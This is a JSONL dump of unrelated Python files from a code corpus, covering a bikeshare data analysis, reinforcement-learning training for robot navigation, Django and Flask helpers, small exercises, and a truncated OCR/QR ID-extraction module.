inputs['svd'] = fit.svdcorrection\n print('\\n' + gv.fmt_values(outputs))\n print(gv.fmt_errorbudget(outputs, inputs))\n print('\\n')\n\n\nif sys.argv[1:]:\n SHOWPLOTS = eval(sys.argv[1])\nif SHOWPLOTS:\n try:\n import matplotlib\n except ImportError:\n SHOWPLOTS = False\n\nif __name__ == '__main__':\n main()","sub_path":"pycfiles/corrfitter-8.0.3.tar/etas-Ds.cpython-34.py","file_name":"etas-Ds.cpython-34.py","file_ext":"py","file_size_in_byte":4820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"435078703","text":"# Pair Sum\n\n# You have been given an integer array/list(ARR) and a number X. Find and return the total number of pairs in the array/list which sum to X.\n# Note:\n# Given array/list can contain duplicate elements. \n# Input format :\n# The first line contains an Integer 't' which denotes the number of test cases or queries to be run. 
Then the test cases follow.\n\n# First line of each test case or query contains an integer 'N' representing the size of the first array/list.\n\n# Second line contains 'N' single space separated integers representing the elements in the array/list.\n\n# Third line contains an integer 'X'.\n# Output format :\n# For each test case, print the total number of pairs present in the array/list.\n\n# Output for every test case will be printed in a separate line.\n# Constraints :\n# 1 <= t <= 10^2\n# 0 <= N <= 10^3\n# 0 <= X <= 10^9\n# Time Limit: 1 sec\n# Sample Input 1:\n# 1\n# 9\n# 1 3 6 2 5 4 3 2 4\n# 7\n# Sample Output 1:\n# 7\n# Sample Input 2:\n# 2\n# 9\n# 1 3 6 2 5 4 3 2 4\n# 12\n# 6\n# 2 8 10 5 -2 5\n# 10\n# Sample Output 2:\n# 0\n# 2\n\n\n# Explanation for Input 2:\n# Since there doesn't exist any pair with sum equal to 12 for the first query, we print 0.\n\n# For the second query, we have 2 pairs in total that sum up to 10. They are, (2, 8) and (5, 5).\n\ndef pair_sum(arr, size, s):\n    count = 0\n    for i in range(size):\n        for j in range(i + 1, size):\n            if (arr[i] + arr[j]) == s:\n                print(arr[i], arr[j])\n                count += 1\n    return count\n\nsize = int(input(\"Enter the size of array: \\n\"))\narr = list(map(int, input().split()))[:size]\ns = int(input(\"Enter the sum value: \\n\"))\nprint(pair_sum(arr, size, s))","sub_path":"pair_sum.py","file_name":"pair_sum.py","file_ext":"py","file_size_in_byte":1657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
{"seq_id":"502433745","text":"# wget https://www.dropbox.com/s/3z11cpntwuasm43/08127_image.png?dl=0; mv 08127_image.png?dl=0 08127_image.png \nimport caffenet\nimport caffe\nimport torch\nimport numpy as np\nfrom torch.autograd import Variable\n\n\ndef load_image(imgfile):\n    height, width = 700, 700 \n    image = caffe.io.load_image(imgfile)\n    transformer = caffe.io.Transformer({'data': (1, 3, height, width)})\n    transformer.set_transpose('data', (2, 0, 1))\n    transformer.set_mean('data', np.array([104., 117., 123.]))\n    transformer.set_raw_scale('data', 7.2801098892805181)\n    transformer.set_channel_swap('data', (2, 1, 0))\n    image = transformer.preprocess('data', image)\n    image = image.reshape(1, 3, height, width)\n    return image\n\n\n# NOTE: the def line for this block is missing from the source; the signature below is a\n# hypothetical reconstruction inferred from the names the body uses (protofile, weightfile, image).\ndef forward_pytorch(protofile, weightfile, image):\n    net = caffenet.CaffeNet(protofile)\n    print(net)\n    net.load_weights(weightfile)\n    net.eval()\n    image = torch.from_numpy(image)\n    image = Variable(image)\n    blobs = net(image)\n    return blobs, net.models\n\n\nprotofile = '/models/testpy_val_91_500_pkg.prototxt'\nweightfile = '/models/test2.caffemodel'\nimgfn = '08127_image.png'\n\n\nimage = torch.from_numpy(load_image(imgfn))\nimage = Variable(image)\nnet = caffenet.CaffeNet(protofile)\nnet.load_weights(weightfile)\n# net = caffenet.CaffeNet(protofile)\n# print(net)\n# net.load_weights(weightfile)\n# net.eval()\n\nblobs = net(image)\n","sub_path":"convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
{"seq_id":"497966240","text":"import time\nimport numpy as np\nimport pandas as pd \nimport statistics\nimport datetime\nimport json\n\nCITY_DATA = { 'chicago': 'chicago.csv',\n              'new york city': 'new_york_city.csv',\n              'washington': 'washington.csv' }\n# valid month entries - invalid months removed\nMONTH_DATA = ['january', 'february', 'march', 'april', 'may', 'june', 'all']\n# valid day entries\nDAY_DATA = ['monday', 'tuesday', 'wednesday', 'thursday', 'friday', 'saturday', 'sunday', 'all']\n\ndef get_filters():\n    \"\"\"\n    
Asks user to specify a city, month, and day to analyze.\n\n    Returns:\n        (str) city - name of the city to analyze\n        (str) month - name of the month to filter by, or \"all\" to apply no month filter\n        (str) day - name of the day of week to filter by, or \"all\" to apply no day filter\n    \"\"\"\n    print('Hello! Let\\'s explore some US bikeshare data!')\n    # get user input for city (chicago, new york city, washington). HINT: Use a while loop to handle invalid inputs\n    while True:\n        print('Enter City that you would like to explore:')\n        print('\\nEnter Chicago, New York city, Washington')\n        #change the case to lower\n        city=input().lower()\n        if city!='chicago':\n            if city!='new york city':\n                if city!='washington':\n                    print(\"Sorry that city is not in the above list...Try again...\")\n                else:\n                    break\n            else:\n                break\n        else:\n            break\n    #get user input for month (all, january, february, ... , june)\n    while True:\n        month = input(\"\\nWhich month would you like results? January, February, March, April, May, June or all ?\\n\")\n        #change the case to lower\n        month = month.lower()\n        if month not in MONTH_DATA:\n            print(\"Sorry that month is not in the above list...Try again\")\n            continue\n        else:\n            break\n\n    \n    \n    # get user input for day of week (all, monday, tuesday, ... sunday)\n    while True:\n        day = input(\"\\nEnter a specific day as follows: Sunday, Monday, Tuesday, Wednesday, Thursday, Friday, Saturday or all for all days.\\n\")\n        #change the case to lower\n        day = day.lower()\n        if day not in DAY_DATA:\n            print(\"Sorry that day is not in the above list...Try again...\")\n            continue\n        else:\n            break\n    \n    print('-'*40)\n    return city, month, day\n\n\ndef load_data(city, month, day):\n    \"\"\"\n    Loads data for the specified city and filters by month and day if applicable.\n\n    Args:\n        (str) city - name of the city to analyze\n        (str) month - name of the month to filter by, or \"all\" to apply no month filter\n        (str) day - name of the day of week to filter by, or \"all\" to apply no day filter\n    Returns:\n        df - Pandas DataFrame containing city data filtered by month and day\n    \"\"\"\n    start_time = time.time()\n\n    # load data file into a dataframe\n    df=pd.read_csv(CITY_DATA[city])\n    \n    # convert the Start Time column to datetime\n    df['Start Time']=pd.to_datetime(df['Start Time'])\n    \n    # extract month and day of week from Start Time to create new columns\n    df['month']=df['Start Time'].dt.month\n    df['day_of_week']=df['Start Time'].dt.weekday_name\n    \n    # filter by month if applicable\n    if month!='all':\n        #use the index of the month list to get the corresponding int\n        # Account for ValueError: 'july' through December is not in list\n        months=['january','february','march','april','may','june','july']\n        month=months.index(month)+1\n        \n        # filter by month to create the new dataframe\n        df = df[df['month'] == month]\n        \n    if day != 'all':\n        df = df[df['day_of_week'] == day.title()]\n        \n\n    print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n    \n    return df\n\n    \ndef time_stats(df):\n    \"\"\"Displays statistics on the most frequent times of travel.\"\"\"\n    \n    print('\\nCalculating The Most Frequent Times of Travel...\\n')\n    start_time = time.time()\n    \n    # TO DO: display the most common month\n    common_month = df['month'].value_counts().idxmax()\n    print(\"The most common month from the data is: \" , common_month)\n\n    # TO DO: display the most common day of week\n    common_day_of_week = df['day_of_week'].value_counts().idxmax()\n    print(\"The most common day of week from the data is: \", common_day_of_week)\n\n    # TO DO: display the most common start hour\n    
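# illustrative aside (not in the original file): pd.Series([7, 7, 9]).value_counts().idxmax() evaluates to 7, the modal value\n    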
df['hour'] = df['Start Time'].dt.hour\n common_hour = df['hour'].value_counts().idxmax()\n print('The most Common Hour from the data is:', common_hour)\n\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n\ndef station_stats(df):\n \"\"\"Displays statistics on the most popular stations and trip of a given city.\"\"\"\n\n print('\\nCalculating The Most Popular Stations and Trip...\\n')\n start_time = time.time()\n \n # TO DO: display most commonly used start station\n start_Station = df['Start Station'].value_counts().idxmax()\n print('Most Commonly used start station:', start_Station)\n \n # TO DO: display most commonly used end station\n end_Station = df['End Station'].value_counts().idxmax()\n print('\\nMost Commonly used end station:', end_Station)\n \n # TO DO: display most frequent combination of start station and end station trip\n #combo_Station = df.groupby(['Start Station','End Station']).size().nlargest(1)\n combo_Station = df.groupby(['Start Station','End Station'])\n combo_Station = combo_Station.size().sort_values(ascending=False).head(1)\n print('\\nMost Commonly used Combo_Station of start station and end station trip:', combo_Station)\n \n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n\ndef trip_duration_stats(df):\n \"\"\"Displays statistics on the total and average trip duration.\"\"\"\n\n print('\\nCalculating Trip Duration...\\n')\n start_time = time.time()\n\n # display total travel time\n total_travel_time = df['Trip Duration'].sum()\n print('Total Travel Time:', total_travel_time)\n\n # display mean travel time\n mean_travel_time = df['Trip Duration'].mean()\n print('Mean Travel Time:', mean_travel_time)\n\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n\ndef user_stats(df):\n \"\"\"Displays statistics on bikeshare users.\"\"\"\n \n print('\\nCalculating User Stats...\\n')\n start_time = time.time()\n \n # Display counts of user types\n print(df['User Type'].value_counts())\n\n # Display counts of gender\n if 'Gender' in df.columns:\n print(df['Gender'].value_counts())\n \n # Display earliest, most recent, and most common year of birth\n if 'Birth Year' in df.columns:\n print(\"\\n The earliest year of birth is\")\n print(min(df['Birth Year']))\n \n #Display most recent year of birth\n if 'Birth Year' in df.columns:\n print(\"\\n The most recent year of birth is\")\n print(max(df['Birth Year'])) \n \n #Display most common year of birth\n if 'Birth Year' in df.columns:\n print(\"\\n The most common year of birth is\")\n print(df['Birth Year'].mode()) \n #print(statistics.mode(df['Birth Year']))\n \n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\ndef show_rows(df):\n\n \"\"\"Displays 5 Rows to the user. \"\"\"\n \n print('\\nDetermining show rows?...\\n')\n start_time = time.time()\n \n i = 0\n show_data = input(\"\\nWould you like to see 5 rows of Data? Enter yes or no.\\n\").lower()\n show_data = show_data.lower() #convert the user input to lower case using lower() function\n pd.set_option('display.max_columns',200)\n\n while True: \n if show_data == 'no':\n break\n elif show_data == 'yes':\n print(df[i:i+5]) #appropriately subset/slice your dataframe to display next five rows\n #print(df[i:i+5].to_json(orient ='index', lines=False)) #appropriately subset/slice your dataframe to display next five rows\n show_data = input(\"\\nWould you like to see 5 more rows of Data? 
Enter 'yes' or 'no'.\\n\").lower()\n i += 5\n else:\n show_data = input(\"\\nYour input is invalid. Please enter only 'yes' or 'no'\\n\").lower()\n \n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40) \n \ndef main():\n \"\"\"This is the main method of the which starts the program.. \"\"\"\n\n while True:\n city, month, day = get_filters()\n print(city, month, day)\n \n df = load_data(city, month, day)\n show_rows(df)\n time_stats(df)\n station_stats(df)\n trip_duration_stats(df)\n user_stats(df)\n \n restart = input('\\nWould you like to restart? Enter yes or no.\\n')\n if restart.lower() != 'yes':\n break\n\n\nif __name__ == \"__main__\":\n\tmain()\n","sub_path":"bikeshare.py","file_name":"bikeshare.py","file_ext":"py","file_size_in_byte":8889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"325815749","text":"\"\"\"\nExperiment configuration for:\nModel: RE-Flex\nBenchmark: zsre\n\"\"\"\nimport fasttext\nimport spacy\nfrom reflex.reflex_runner import ReflexRunner\nfrom reflex.utils import setup_experiment, save_reflex_e_list\nimport pickle\nimport os\n\nex = setup_experiment('RE-Flex zsre 3 relations lambda')\n\n@ex.config\ndef conf():\n model_dir = os.path.join(os.environ['BASE_PATH'], 'weights/roberta_large') # Path to trained weights\n model_name = os.path.join(os.environ['BASE_PATH'], 'weights/roberta_large/model.pt')\n relations_filepath = os.path.join(os.environ['BASE_PATH'], 'data/zsre_3_relations.jsonl') # Path to relations file\n data_directory = os.path.join(os.environ['BASE_PATH'], 'data/zsre/test') # Path to underlying data\n hyperparam_path = os.path.join(os.environ['BASE_PATH'], 'zsre_tune.pkl')\n error_path = os.path.join(os.environ['BASE_PATH'], 'figures', 'reflex_zsre2.csv')\n batch_size = 16\n must_choose_answer = False\n device = 'cuda'\n k = 16\n ls = [-2, -1.5, -1, -0.5, 0, 0.5, 1, 1.5, 2]\n override_expand = False\n override_expand_value = False\n word_embeddings_path = os.path.join(os.environ['BASE_PATH'], 'weights/crawl-300d-2M-subword.bin')\n\n@ex.automain\ndef main(model_dir, model_name, device, relations_filepath, data_directory, batch_size, must_choose_answer, word_embeddings_path, k, hyperparam_path, error_path, override_expand, override_expand_value, ls):\n with open(hyperparam_path, 'rb') as rf:\n hyperparams = pickle.load(rf)\n\n spacy_model = spacy.load('en_core_web_lg')\n we_model = fasttext.load_model(word_embeddings_path)\n runner = ReflexRunner(model_dir, model_name, device, relations_filepath, data_directory, batch_size, must_choose_answer, 0, we_model, spacy_model, k, override_expand_value, hyperparams=hyperparams)\n runner.override_l = True\n result_dict = {}\n for l in ls:\n runner.update_l(l)\n em, f1, per_relation_metrics = runner.predict()\n result_dict[l] = per_relation_metrics\n with open('zsre_3.pkl', 'wb') as wf:\n pickle.dump(result_dict, wf)\n return result_dict\n\n","sub_path":"reflex/experiments/zsre_3.py","file_name":"zsre_3.py","file_ext":"py","file_size_in_byte":2094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"347631481","text":"from django.core.exceptions import ValidationError\nimport re\n\n\ndef validate_amount(amount):\n amount = str(amount)\n if not re.match(r\"^[0-9]{1,5}\\.[0-9]{2}$\", amount):\n raise ValidationError(\n 'Incorrect amount provided, should match positive with two decimals',\n params={'amount': amount}\n 
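# illustrative examples: '123.45' matches the pattern above, while '1234.5' (one decimal place) and '-3.00' (signed) do not\n        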
)\n","sub_path":"djangoapp/djangoapp/apps/balance/validators.py","file_name":"validators.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"114933134","text":"import re\n\nfrom flask import Blueprint, jsonify, request\n\nfrom common.smtp import sendEmail\n\nverification_Blue = Blueprint('verification', __name__)\n\n\n@verification_Blue.route('/member/verification/', methods=['GET'], strict_slashes=False)\ndef sendVerification():\n # 发送验证码\n user_email = request.args.get('email')\n if user_email == '' or user_email is None:\n return jsonify({'code': 3001, 'message': 'Please entry your email'})\n elif re.match(r'^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+.[a-zA-Z]{1,3}$', user_email):\n sendEmail(user_email)\n return jsonify({'code': 200, 'message': 'Send a success'})\n else:\n return jsonify({'code': 3002, 'message': 'Please check your email format'})\n\n","sub_path":"member/verification.py","file_name":"verification.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"505656984","text":"'''\r\nAuthor : hupeng\r\nTime : 2021/8/10 10:19 \r\nDescription: \r\n'''\r\nimport time\r\nimport multiprocessing\r\nfrom collections import defaultdict, OrderedDict\r\nfrom multiprocessing import cpu_count\r\nfrom concurrent.futures import ThreadPoolExecutor\r\n\r\n\r\nclass MultiPool(object):\r\n def __init__(self, max_workers=None, initializer=None, initargs=(),\r\n maxtasksperchild=None):\r\n if max_workers is None:\r\n max_workers = cpu_count()\r\n\r\n multiprocessing.freeze_support()\r\n self.pool = multiprocessing.Pool(processes=max_workers, initializer=initializer, initargs=initargs,\r\n maxtasksperchild=maxtasksperchild)\r\n\r\n def submit(self, func, args=(), callback=None,\r\n error_callback=None, **kwargs):\r\n return self.pool.apply_async(func, args=args, kwds=kwargs, callback=callback,\r\n error_callback=error_callback)\r\n\r\n def close(self):\r\n return self.pool.close()\r\n\r\n def join(self):\r\n return self.pool.join()\r\n\r\n\r\nclass ThreadPool(object):\r\n def __init__(self):\r\n self.pool = ThreadPoolExecutor()\r\n\r\n def __call__(self, *args, **kwargs):\r\n return self.pool\r\n\r\n\r\nthread_pool = ThreadPool()\r\n\r\n\r\nclass GeneralAsync(object):\r\n __POOL = {'thread': thread_pool, 'process': MultiPool}\r\n\r\n def __init__(self, num_processor=None, mode='thread'):\r\n self._funcs = []\r\n self.num_processor = num_processor\r\n self.mode = mode\r\n assert mode in self.__POOL, \\\r\n f'mode param must be `thread` or `process`, but given {mode}'\r\n\r\n def __getattr__(self, item):\r\n pass\r\n\r\n def _pool(self, **kwargs):\r\n return self.__POOL[self.mode](**kwargs)\r\n\r\n def add_func(self, func, f_name=None, **params):\r\n '''\r\n 追加并行执行的任务\r\n :param func: func\r\n :param params: param1, param2\r\n :return:\r\n '''\r\n assert callable(func), 'func object must be callable'\r\n params['func'] = func\r\n params['f_name'] = f_name or func.__name__\r\n self._funcs.append(params)\r\n\r\n def run(self):\r\n task = OrderedDict()\r\n response = defaultdict(list)\r\n pool = self._pool(max_workers=len(self._funcs))\r\n\r\n for func_info in self._funcs:\r\n func = func_info.pop('func')\r\n f_name = func_info.pop('f_name')\r\n task[f_name] = pool.submit(func, **func_info)\r\n\r\n if self.mode == 'process':\r\n pool.close()\r\n pool.join()\r\n\r\n for name, t in task.items():\r\n result = t.result() if 
hasattr(t, 'result') else t.get()\r\n setattr(self, name, result)\r\n response[name].append(result)\r\n return response\r\n","sub_path":"fairy/utils/asyncs.py","file_name":"asyncs.py","file_ext":"py","file_size_in_byte":2789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"363621419","text":"import os\nimport rospy\n\nfrom datetime import datetime as dt\n\nfrom stable_baselines3 import PPO\nfrom stable_baselines3.common.vec_env import SubprocVecEnv, DummyVecEnv, VecNormalize\nfrom stable_baselines3.common.monitor import Monitor\nfrom stable_baselines3.common.callbacks import EvalCallback\n\nfrom task_generator.task_generator.tasks import get_predefined_task\nfrom arena_navigation.arena_local_planner.learning_based.arena_local_planner_drl.scripts.custom_policy import *\nfrom arena_navigation.arena_local_planner.learning_based.arena_local_planner_drl.rl_agent.envs.flatland_gym_env import FlatlandEnv\nfrom arena_navigation.arena_local_planner.learning_based.arena_local_planner_drl.tools.argsparser import parse_training_args\nfrom arena_navigation.arena_local_planner.learning_based.arena_local_planner_drl.tools.train_agent_utils import *\nfrom arena_navigation.arena_local_planner.learning_based.arena_local_planner_drl.tools.custom_mlp_utils import *\nfrom arena_navigation.arena_local_planner.learning_based.arena_local_planner_drl.tools.staged_train_callback import InitiateNewTrainStage\n\n##### HYPERPARAMETER #####\n\"\"\" will be used upon initializing new agent \"\"\"\nrobot = \"myrobot\"\ngamma = 0.99\nn_steps = 128\nent_coef = 0.01\nlearning_rate = 2.5e-4\nvf_coef = 0.5\nmax_grad_norm = 0.5\ngae_lambda = 0.95\nbatch_size = 64\nn_epochs = 4\nclip_range = 0.2\nreward_fnc = \"rule_01\"\ndiscrete_action_space = False\nnormalize = True\nstart_stage = 1\ntask_mode = \"staged\" # custom, random or staged\nnormalize = True\n##########################\n\n\ndef get_agent_name(args):\n \"\"\" Function to get agent name to save to/load from file system\n \n Example names:\n \"MLP_B_64-64_P_32-32_V_32-32_relu_2021_01_07__10_32\"\n \"DRL_LOCAL_PLANNER_2021_01_08__7_14\"\n\n :param args (argparse.Namespace): Object containing the program arguments\n \"\"\"\n START_TIME = dt.now().strftime(\"%Y_%m_%d__%H_%M\")\n\n if args.custom_mlp:\n return \"MLP_B_\" + args.body + \"_P_\" + args.pi + \"_V_\" + args.vf + \"_\" + args.act_fn + \"_\" + START_TIME\n if args.load is None:\n return args.agent + \"_\" + START_TIME\n return args.load\n\n\ndef get_paths(agent_name: str, args) -> dict:\n \"\"\" Function to generate agent specific paths \n \n :param agent_name: Precise agent name (as generated by get_agent_name())\n :param args (argparse.Namespace): Object containing the program arguments\n \"\"\"\n dir = rospkg.RosPack().get_path('arena_local_planner_drl')\n\n PATHS = {\n 'model' : os.path.join(dir, 'agents', agent_name),\n 'tb' : os.path.join(dir, 'training_logs', 'tensorboard', agent_name),\n 'eval' : os.path.join(dir, 'training_logs', 'train_eval_log', agent_name),\n 'robot_setting' : os.path.join(rospkg.RosPack().get_path('simulator_setup'), 'robot', robot + '.model.yaml'),\n 'robot_as' : os.path.join(rospkg.RosPack().get_path('arena_local_planner_drl'), 'configs', 'default_settings.yaml'),\n 'curriculum' : os.path.join(rospkg.RosPack().get_path('arena_local_planner_drl'), 'configs', 'training_curriculum.yaml')\n }\n # check for mode\n if args.load is None:\n os.makedirs(PATHS.get('model'))\n else:\n if not 
os.path.isfile(os.path.join(PATHS.get('model'), AGENT_NAME + \".zip\")) and not os.path.isfile(os.path.join(PATHS.get('model'), \"best_model.zip\")):\n raise FileNotFoundError(\"Couldn't find model named %s.zip' or 'best_model.zip' in '%s'\" % (AGENT_NAME, PATHS.get('model')))\n # evaluation log enabled\n if args.eval_log:\n if not os.path.exists(PATHS.get('eval')):\n os.makedirs(PATHS.get('eval'))\n else:\n PATHS['eval'] = None\n # tensorboard log enabled\n if args.tb:\n if not os.path.exists(PATHS.get('tb')):\n os.makedirs(PATHS.get('tb'))\n else:\n PATHS['tb'] = None\n\n return PATHS\n\n\nif __name__ == \"__main__\":\n args, _ = parse_training_args()\n\n rospy.init_node(\"train_node\")\n\n # generate agent name and model specific paths\n AGENT_NAME = get_agent_name(args)\n PATHS = get_paths(AGENT_NAME, args)\n\n print(\"________ STARTING TRAINING WITH: %s ________\\n\" % AGENT_NAME)\n\n # initialize hyperparameters (save to/ load from json)\n hyperparams_obj = agent_hyperparams(\n AGENT_NAME, robot, gamma, n_steps, ent_coef, learning_rate, vf_coef,max_grad_norm, gae_lambda, batch_size, \n n_epochs, clip_range, reward_fnc, discrete_action_space, normalize, task_mode, start_stage)\n params = initialize_hyperparameters(agent_name=AGENT_NAME, PATHS=PATHS, hyperparams_obj=hyperparams_obj, load_target=args.load)\n\n # instantiate gym environment\n n_envs = 1\n task_manager = get_predefined_task(params['task_mode'], params['curr_stage'], PATHS)\n env = DummyVecEnv(\n [lambda: FlatlandEnv(task_manager, PATHS.get('robot_setting'), PATHS.get('robot_as'), params['reward_fnc'], params['discrete_action_space'], goal_radius=1.00, max_steps_per_episode=200)] * n_envs)\n if params['normalize']:\n env = VecNormalize(env, training=True, norm_obs=True, norm_reward=False, clip_reward=15)\n\n # instantiate eval environment\n trainstage_cb = InitiateNewTrainStage(TaskManager=task_manager, TreshholdType=\"rew\", rew_threshold=14.5, task_mode=params['task_mode'], verbose=1)\n eval_env = Monitor(FlatlandEnv(\n task_manager, PATHS.get('robot_setting'), PATHS.get('robot_as'), params['reward_fnc'], params['discrete_action_space'], goal_radius=1.00, max_steps_per_episode=250),\n PATHS.get('eval'), info_keywords=(\"done_reason\",))\n eval_env = DummyVecEnv([lambda: eval_env])\n if params['normalize']:\n eval_env = VecNormalize(eval_env, training=False, norm_obs=True, norm_reward=False, clip_reward=15)\n eval_cb = EvalCallback(\n eval_env, n_eval_episodes=20, eval_freq=15000, log_path=PATHS.get('eval'), best_model_save_path=PATHS.get('model'), deterministic=True, callback_on_new_best=trainstage_cb)\n\n # determine mode\n if args.custom_mlp:\n # custom mlp flag\n model = PPO(\"MlpPolicy\", env, policy_kwargs = dict(net_arch = args.net_arch, activation_fn = get_act_fn(args.act_fn)), \n gamma = gamma, n_steps = n_steps, ent_coef = ent_coef, learning_rate = learning_rate, vf_coef = vf_coef, \n max_grad_norm = max_grad_norm, gae_lambda = gae_lambda, batch_size = batch_size, n_epochs = n_epochs, clip_range = clip_range, \n tensorboard_log = PATHS.get('tb'), verbose = 1)\n elif args.agent is not None:\n # predefined agent flag\n if args.agent == \"MLP_ARENA2D\":\n model = PPO(MLP_ARENA2D_POLICY, env, gamma = gamma, n_steps = n_steps, ent_coef = ent_coef, \n learning_rate = learning_rate, vf_coef = vf_coef, max_grad_norm = max_grad_norm, gae_lambda = gae_lambda, \n batch_size = batch_size, n_epochs = n_epochs, clip_range = clip_range, tensorboard_log = PATHS.get('tb'), verbose = 1)\n\n elif args.agent == 
\"DRL_LOCAL_PLANNER\" or args.agent == \"CNN_NAVREP\":\n if args.agent == \"DRL_LOCAL_PLANNER\":\n policy_kwargs = policy_kwargs_drl_local_planner\n else:\n policy_kwargs = policy_kwargs_navrep\n\n model = PPO(\"CnnPolicy\", env, policy_kwargs = policy_kwargs, \n gamma = gamma, n_steps = n_steps, ent_coef = ent_coef, learning_rate = learning_rate, vf_coef = vf_coef, \n max_grad_norm = max_grad_norm, gae_lambda = gae_lambda, batch_size = batch_size, n_epochs = n_epochs, \n clip_range = clip_range, tensorboard_log = PATHS.get('tb'), verbose = 1)\n else:\n # load flag\n if os.path.isfile(os.path.join(PATHS.get('model'), AGENT_NAME + \".zip\")):\n model = PPO.load(os.path.join(PATHS.get('model'), AGENT_NAME), env)\n elif os.path.isfile(os.path.join(PATHS.get('model'), \"best_model.zip\")):\n model = PPO.load(os.path.join(PATHS.get('model'), \"best_model\"), env)\n\n # set num of timesteps to be generated robot\n if args.n is None:\n n_timesteps = 60000000\n else:\n n_timesteps = args.n\n\n # start training\n model.learn(total_timesteps = n_timesteps, callback=eval_cb, reset_num_timesteps = False)\n\n # update the timesteps the model has trained in total\n update_total_timesteps_json(hyperparams_obj, n_timesteps, PATHS)\n print(\"training done!\")\n \n\"\"\"\n s = time.time()\n model.learn(total_timesteps = 3000)\n print(\"steps per second: {}\".format(1000 / (time.time() - s)))\n # obs = env.reset()\n # for i in range(1000):\n # action, _state = model.predict(obs, deterministic = True)\n # obs, reward, done, info = env.step(action)\n # env.render()\n # if done:\n # obs = env.reset()\n\"\"\"","sub_path":"arena_navigation/arena_local_planner/learning_based/arena_local_planner_drl/scripts/training/train_agent.py","file_name":"train_agent.py","file_ext":"py","file_size_in_byte":8779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"72999144","text":"import os\nos.environ.setdefault('DJANGO_SETTINGS_MODULE',\n 'WebSite.settings')\n\n\nimport django\ndjango.setup()\n\nfrom saltfish.models import Category\n\n\ndef populate():\n categories = ['sports', 'luggage', 'booties', ' cosmetics', 'digital',\n 'furniture', 'home appliances', 'medicine']\n for cat in categories:\n add_category(cat)\n\n\ndef add_category(name):\n c = Category.objects.get_or_create(name=name)[0]\n c.save()\n\n\nif __name__ == '__main__':\n print('Starting saltfish population script...')\n populate()\n","sub_path":"WebSite/populate.py","file_name":"populate.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"152760478","text":"menu = input(open(\"Menu.txt\").read())\r\n\r\nwhile menu not in [str(i) for i in range(1,12)]:\r\n menu = input(\"Inccorect Input\\n>>> \")\r\n\r\nDict = {\"1\":\"+\",\"2\":\"-\",\"3\":\"*\",\"4\":\"/\",\"5\":\"**\",\"6\":\"%\",\"7\":\"<<\",\"8\":\">>\",\"9\":\"&\",\"10\":\"|\",\"11\":\"^\",}\r\n(num1, num2) = (\"\", \"\")\r\nwhile (num1 + num2).isdigit()!=True:\r\n num1 = input(\"Enter your first number: \")\r\n num2 = input(\"Enter your second number: \")\r\n if (num1 + num2).isdigit()!=True: print(\"\\nNot a valid input!\")\r\n\r\nprint(num1, Dict[menu], num2, \"=\",eval(num1+Dict[menu]+num2))\r\n","sub_path":"Python/PYTHONchallenges/Python/Python/Python Programming/bit/calc/calc.py","file_name":"calc.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} 
+{"seq_id":"129750105","text":"from ocr_cnn import OCR_NeuralNetwork\nimport ensemble\n\ndef ocr_cnn_ensamble_builder(classes, nb_epochs, number_of_nets=5, path=\"checkpoints//temp\"):\n\t\n\tmy_ensemble = ensemble.ensemble()\n\n\tfor i in range(number_of_nets):\n\t\tnet = OCR_NeuralNetwork(classes, nb_epochs=nb_epochs, model_dir=path, model_name=str(i), batch_size=128)\n\t\tmy_ensemble.add_model(net)\n\n\treturn my_ensemble\n\n\n\n\n\n","sub_path":"Notebooks/ocr_ensamble_builder.py","file_name":"ocr_ensamble_builder.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"294415402","text":"# This class will be an abstract get ID data class\n\nclass ExtractIDData(object):\n\n def __init__(self):\n self.data = \"\";\n\n # call this method to get the data associated with the frame in string type\n def get_data(self, frame):\n self.data = self._extract_data(frame)\n return self.data\n\n # extract the data depending on the specific way we are using it\n def _extract_data(self, frame):\n pass\n\nimport cv2\nimport os\nimport numpy as np\nimport zbar\nimport sys\n\n# used to extarct the data via qr code\nclass ExtractIDDataQR(ExtractIDData):\n\n def __init__(self):\n ExtractIDData.__init__(self)\n self.scanner = zbar.Scanner()\n\n # get the data by reading the frame and decoding it\n def _extract_data(self, frame):\n results = self.scanner.scan(frame)\n final_result = \"\"\n for result in results:\n final_result += str(result.data.decode('utf-8'))\n return final_result\n\n# used to extract the code via text recognition using tesseract\nclass ExtractIDDataTesseract(ExtractIDDate):\n def __init__(self):\n ExtractIDData.__init__(self)\n self.TEXT_ID_LIST = ['Topic nr.','Topic --']\n\n def _extract_data(frame):\n img_arr = Image.fromarray(frame) # convert from array to image\n img_arr_grey = img_arr.convert('L') # use grey converter (greyscale)\n img_arr_thresh = img_arr_grey.point(lambda x: 0 if 0<=x<=150 else -256) # set threshold for black and white\n frame_txt = image_to_string(img_arr_thresh) # get text from black and white image\n return frame_txt\n\n#\n# # used to extract data using hamming and SIMM\nclass 